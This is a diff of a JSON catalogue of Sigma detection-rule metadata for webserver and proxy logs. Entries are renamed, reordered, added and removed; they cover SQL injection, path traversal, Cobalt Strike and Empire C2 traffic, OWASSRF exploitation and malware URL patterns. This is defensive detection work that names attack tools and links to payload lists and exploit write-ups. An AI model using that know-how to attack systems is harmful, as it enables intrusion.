"https://attack.mitre.org/matrices/enterprise/cloud/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_role_access.yml" ], "tags": [ @@ -89425,11 +90143,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_container_registry_created_or_deleted.yml" ], "tags": [ @@ -89538,9 +90256,9 @@ "logsource.product": "azure", "refs": [ "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_cronjob.yml" ], "tags": [ @@ -89576,11 +90294,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_rolebinding_modified_or_deleted.yml" ], "tags": [ @@ -89822,11 +90540,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_network_policy_change.yml" ], "tags": [ @@ -89851,11 +90569,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_service_account_modified_or_deleted.yml" ], "tags": [ @@ -89888,8 +90606,8 @@ "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ - "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/", + "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/nginx/web_nginx_core_dump.yml" ], "tags": [ @@ -90068,11 +90786,11 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://github.com/payloadbox/sql-injection-payload-list", + "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", "https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection", "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", - "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", "https://brightsec.com/blog/sql-injection-payloads/", - "https://github.com/payloadbox/sql-injection-payload-list", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_sql_injection_in_access_logs.yml" ], "tags": [ @@ -90105,9 +90823,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516", - "https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029", "https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash", + "https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029", + "https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_f5_tm_utility_bash_api_request.yml" ], "tags": [ @@ -90140,8 +90858,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1", + "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_source_code_enumeration.yml" ], "tags": [ @@ -90174,11 +90892,11 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", - "https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035", - "https://twitter.com/httpvoid0x2f/status/1532924261035384832", "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", + "https://twitter.com/httpvoid0x2f/status/1532924261035384832", + "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", + "https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_java_payload_in_access_logs.yml" ], "tags": [ @@ -90250,8 +90968,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://book.hacktricks.xyz/pentesting-web/file-inclusion", "https://github.com/projectdiscovery/nuclei-templates", + "https://book.hacktricks.xyz/pentesting-web/file-inclusion", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_path_traversal_exploitation_attempt.yml" ], "tags": [ @@ -90285,8 +91003,8 @@ "logsource.product": "No established product", "refs": [ "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", - "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", + "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_susp_useragents.yml" ], "tags": [ @@ -90353,9 +91071,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", "https://www.exploit-db.com/exploits/19525", "https://github.com/lijiejie/IIS_shortname_Scanner", - "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml" ], "tags": [ @@ -90444,6 +91162,74 @@ "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", "value": "Server Side Template Injection Strings" }, + { + "description": "Detect the update check performed by Advanced IP/Port Scanner utilities.", + "meta": { + "author": "Axel Olsson", + "creation_date": "2022/08/14", + "falsepositive": [ + "Expected if you legitimately use the Advanced IP or Port Scanner utilities in your environement." + ], + "filename": "proxy_pua_advanced_ip_scanner_update_check.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.advanced-port-scanner.com/", + "https://www.advanced-ip-scanner.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_pua_advanced_ip_scanner_update_check.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1590" + ] + }, + "related": [ + { + "dest-uuid": "9d48cab2-7929-4812-ad22-f536665f0109", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", + "value": "PUA - Advanced IP/Port Scanner Update Check" + }, + { + "description": "Detects user agent and URI paths used by empire agents", + "meta": { + "author": "Florian Roth (Nextron Systems)", + "creation_date": "2020/07/13", + "falsepositive": [ + "Valid requests with this exact user agent to server scripts of the defined names" + ], + "filename": "proxy_hktl_empire_ua_uri_patterns.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/BC-SECURITY/Empire", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_hktl_empire_ua_uri_patterns.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", + "value": "HackTool - Empire UserAgent URI Combo" + }, { "description": "Detects suspicious user agent strings used in APT malware in proxy logs", "meta": { @@ -90490,8 +91276,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://deviceatlas.com/blog/list-of-user-agent-strings#desktop", "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", + "https://deviceatlas.com/blog/list-of-user-agent-strings#desktop", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_susp_base64.yml" ], "tags": [ @@ -90511,40 +91297,6 @@ "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", "value": "Potential Base64 Encoded User-Agent" }, - { - "description": "Detects user agent and URI paths used by empire agents", - "meta": { - "author": "Florian Roth (Nextron Systems)", - "creation_date": "2020/07/13", - "falsepositive": [ - "Valid requests with this exact user agent to server scripts of the defined names" - ], - "filename": "proxy_empire_ua_uri_combos.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/BC-SECURITY/Empire", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_empire_ua_uri_combos.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "related": [ - { - "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", - "value": "Empire UserAgent URI Combo" - }, { "description": "Detects Bitsadmin connections to domains with uncommon TLDs", "meta": { @@ -90591,55 +91343,20 @@ "value": "Bitsadmin to Uncommon TLD" }, { - "description": "Detects Turla ComRAT patterns", + "description": "Detects Baby Shark C2 Framework default communication patterns", "meta": { "author": "Florian Roth (Nextron Systems)", - "creation_date": "2020/05/26", + "creation_date": "2021/06/09", "falsepositive": [ - "Unknown" + "Unlikely" ], - "filename": "proxy_turla_comrat.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_turla_comrat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001", - "attack.g0010" - ] - }, - "related": [ - { - "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "7857f021-007f-4928-8b2c-7aedbe64bb82", - "value": "Turla ComRAT" - }, - { - "description": "Detects HTTP requests used by Chafer malware", - "meta": { - "author": "Florian Roth (Nextron Systems)", - "creation_date": "2019/01/31", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_chafer_malware.yml", + "filename": "proxy_hktl_baby_shark_default_agent_url.yml", "level": "critical", "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://securelist.com/chafer-used-remexi-malware/89538/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_chafer_malware.yml" + "https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_hktl_baby_shark_default_agent_url.yml" ], "tags": [ "attack.command_and_control", @@ -90655,43 +91372,8 @@ "type": "related-to" } ], - "uuid": "fb502828-2db0-438e-93e6-801c7548686d", - "value": "Chafer Malware URL Pattern" - }, - { - "description": "Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint", - "meta": { - "author": "Nasreddine Bencherchali (Nextron Systems)", - "creation_date": "2022/12/22", - "falsepositive": [ - "Unlikely" - ], - "filename": "proxy_exchange_owassrf_poc_exploitation.yml", - "level": "critical", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", - "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", - "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_exchange_owassrf_poc_exploitation.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "related": [ - { - "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "fdd7e904-7304-4616-a46a-e32f917c4be4", - "value": "OWASSRF Exploitation Attempt Using Public POC - Proxy" + "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", + "value": "HackTool - BabyShark Agent Default URL Pattern" }, { "description": "Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs", @@ -90803,40 +91485,6 @@ "uuid": "195c1119-ef07-4909-bb12-e66f5e07bf3c", "value": "Download from Suspicious Dyndns Hosts" }, - { - "description": "Detects Malleable OneDrive Profile", - "meta": { - "author": "Markus Neis", - "creation_date": "2019/11/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_cobalt_onedrive.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_cobalt_onedrive.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "related": [ - { - "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", - "value": "CobaltStrike Malleable OneDrive Browsing Traffic Profile" - }, { "description": "Detects suspicious malformed user agent strings in proxy logs", "meta": { @@ -90883,9 +91531,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_telegram_api.yml" ], "tags": [ @@ -90977,14 +91625,14 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", - "https://perishablepress.com/blacklist/ua-2013.txt", - "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", - "https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q", "https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large", - "http://www.botopedia.org/search?searchword=scan&searchphrase=all", - "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q", "https://twitter.com/crep1x/status/1635034100213112833", + "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", + "http://www.botopedia.org/search?searchword=scan&searchphrase=all", + "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", + "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://perishablepress.com/blacklist/ua-2013.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_malware.yml" ], "tags": [ @@ -91004,6 +91652,75 @@ "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", "value": "Malware User Agent" }, + { + "description": "Detects a potentially suspicious empty user agent strings in proxy log.\nCould potentially indicate an uncommon request method.\n", + "meta": { + "author": "Florian Roth (Nextron Systems)", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_empty.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/Carlos_Perez/status/883455096645931008", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_empty.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", + "value": "HTTP Request With Empty User Agent" + }, + { + "description": "Detects Windows PowerShell Web Access", + "meta": { + "author": "Florian Roth (Nextron Systems)", + "creation_date": "2017/03/13", + "falsepositive": [ + "Administrative scripts that download files from the Internet", + "Administrative scripts that retrieve certain website contents" + ], + "filename": "proxy_ua_powershell.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_powershell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "c8557060-9221-4448-8794-96320e6f3e74", + "value": "Windows PowerShell User Agent" + }, { "description": "Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.", "meta": { @@ -91017,9 +91734,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://blog.talosintelligence.com/ipfs-abuse/", "https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638", "https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11", + "https://blog.talosintelligence.com/ipfs-abuse/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml" ], "tags": [ @@ -91117,40 +91834,6 @@ "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", "value": "Rclone Activity via Proxy" }, - { - "description": "Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint", - "meta": { - "author": "Nasreddine Bencherchali (Nextron Systems)", - "creation_date": "2022/12/22", - "falsepositive": [ - "Web vulnerability scanners" - ], - "filename": "proxy_exchange_owassrf_exploitation.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", - "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_exchange_owassrf_exploitation.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "related": [ - { - "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "1ddf4596-1908-43c9-add2-1d2c2fcc4797", - "value": "Potential OWASSRF Exploitation Attempt - Proxy" - }, { "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", "meta": { @@ -91185,107 +91868,6 @@ "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", "value": "Crypto Miner User Agent" }, - { - "description": "Detects download of Ursnif malware done by dropper documents.", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/12/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ursnif_malware_download_url.yml", - "level": "high", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://notebook.community/Cyb3rWard0g/HELK/docker/helk-jupyter/notebooks/sigma/proxy_ursnif_malware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ursnif_malware_download_url.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "related": [ - { - "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "a36ce77e-30db-4ea0-8795-644d7af5dfb4", - "value": "Ursnif Malware Download URL Pattern" - }, - { - "description": "Detects URL pattern used by iOS Implant", - "meta": { - "author": "Florian Roth (Nextron Systems)", - "creation_date": "2019/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_ios_implant.yml", - "level": "critical", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", - "https://twitter.com/craiu/status/1167358457344925696", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ios_implant.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.collection", - "attack.t1005", - "attack.t1119", - "attack.credential_access", - "attack.t1528", - "attack.t1552.001" - ] - }, - "related": [ - { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - }, - { - "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - }, - { - "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6", - "value": "iOS Implant URL Pattern" - }, { "description": "Detects POST requests to the F5 BIG-IP iControl Rest API \"bash\" endpoint, which allows the execution of commands on the BIG-IP", "meta": { @@ -91299,9 +91881,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516", - "https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029", "https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash", + "https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029", + "https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_f5_tm_utility_bash_api_request.yml" ], "tags": [ @@ -91321,40 +91903,6 @@ "uuid": "b59c98c6-95e8-4d65-93ee-f594dfb96b17", "value": "F5 BIG-IP iControl Rest API Command Execution - Proxy" }, - { - "description": "Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike", - "meta": { - "author": "Florian Roth (Nextron Systems)", - "creation_date": "2021/05/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proxy_cobalt_malformed_uas.yml", - "level": "critical", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_cobalt_malformed_uas.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "related": [ - { - "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "41b42a36-f62c-4c34-bd40-8cb804a34ad8", - "value": "CobaltStrike Malformed UAs in Malleable Profiles" - }, { "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", "meta": { @@ -91405,40 +91953,6 @@ "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", "value": "Raw Paste Service Access" }, - { - "description": "Detect update check performed by Advanced IP Scanner and Advanced Port Scanner", - "meta": { - "author": "Axel Olsson", - "creation_date": "2022/08/14", - "falsepositive": [ - "Legitimate use by administrators" - ], - "filename": "proxy_adv_ip_port_scanner_upd_check.yml", - "level": "medium", - "logsource.category": "proxy", - "logsource.product": "No established product", - "refs": [ - "https://www.advanced-ip-scanner.com/", - "https://www.advanced-port-scanner.com/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_adv_ip_port_scanner_upd_check.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1590" - ] - }, - "related": [ - { - "dest-uuid": "9d48cab2-7929-4812-ad22-f536665f0109", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", - "value": "Advanced IP/Port Scanner Update Check" - }, { "description": "Detects suspicious encoded User-Agent strings, as seen used by some malware.", "meta": { @@ -91485,10 +91999,10 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ + "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", + "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", "https://www.spamhaus.org/statistics/tlds/", "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", - "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", - "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml" ], "tags": [ @@ -91526,21 +92040,24 @@ "value": "Download From Suspicious TLD - Blacklist" }, { - "description": "Detects 